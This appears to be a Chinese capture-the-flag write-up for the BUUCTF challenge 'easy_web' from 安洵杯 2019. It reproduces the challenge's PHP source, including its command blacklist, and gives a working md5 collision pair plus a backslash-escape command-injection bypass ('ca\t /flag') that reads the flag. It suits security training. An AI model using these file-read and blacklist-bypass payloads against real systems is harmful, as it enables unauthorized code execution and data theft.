buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web
2024-10-20 04:00:27
尝试之路加wp
观察源代码和get所传参数可猜测img所传参数img就是该图片
经过两次base64编码和一次hex编码后可得555.png成果验证猜测
然后发现该图片以data元数据封装的方式放到了源码里
猜测可以通过此漏过获得index.php的源码
于是将img处参数设为经过两次base64编码和一次hex编码后的index.php
成功获得index.php源代码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
通过分析源代码可知不能通过img处获得flag
然而我们发现cmd命令是通过黑名单验证以及要经过一次md5的校验(常见套路)
md5 通过百度查询md5强碰撞的例子即可得到
然而cmd参数处的命令执行绕过是通过反斜杠逃逸实现的
即ca\t /flag,原理下文剖析
于是该题的payload
知识点总结
1.md5强碰撞
参考博客:https://www.jianshu.com/p/c9089fd5b1ba
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
- 1
- 2
2反斜杠逃逸绕过黑名单进行rce
这个题就卡在这个点上了
这个原理是因为 当在前端输入ca\t时
后端将此字符存为字符串"ca\\t"
而"ca\\t"需要用“\\\\t”来匹配
从而绕过正则
而且在shell命令里可以随便加\不影响执行
而
最新文章
- InfoPath错误,此文档库已被重命名或删除
- Web Service 的工作原理
- 转: Git远程操作详解 (阮一峰)
- jquery设置checkbox状态,设置dropdownlist选中值,隐藏某控件,给某控件追加东西
- 关于easyUI 的tabs 在子页面增加显示tabs的一个问题
- oracle10g如何配置客户端
- ASP.NET的错误处理机制之二(实例log4net)
- Java安装程序制作
- 10款经典的web前端特效的预览及源码
- 【转】常用插件和mvn test命令
- Energy Minimization
- 瑞柏匡丞谈中国移动app的国际进阶路
- 实现FileCopy(Ring0 x86 x64)
- LeetCode之Maximum Product Subarray
- [Swift]LeetCode274.H指数 | H-Index
- 68.纯 CSS 创作一本色卡
- 搭建gogs常见问题
- oracle 11g完全彻底的卸载
- 【BZOJ1826】[JSOI2010]缓存交换(贪心)
- 比较两种方式的form请求提交